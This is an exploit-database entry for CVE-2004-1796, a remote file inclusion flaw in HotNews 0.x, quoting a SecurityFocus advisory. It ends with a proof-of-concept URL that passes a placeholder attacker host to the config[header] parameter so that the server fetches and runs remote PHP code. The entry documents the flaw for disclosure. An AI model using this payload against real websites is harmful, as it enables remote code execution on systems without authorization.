HotNews 0.x - 'hotnews-engine.inc.php3?config[header]' Remote File Inclusion
| EKU-ID: 28958 | CVE: CVE-2004-1796;OSVDB-3332 | OSVDB-ID: |
| Author: Officerrr | Published: 2004-01-05 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28958 | CVE: CVE-2004-1796;OSVDB-3332 | OSVDB-ID: |
| Author: Officerrr | Published: 2004-01-05 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/9357/info HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software. http://www.example.com/includes/hotnews-engine.inc.php3?config[header]=http://[evil host]/[evil file]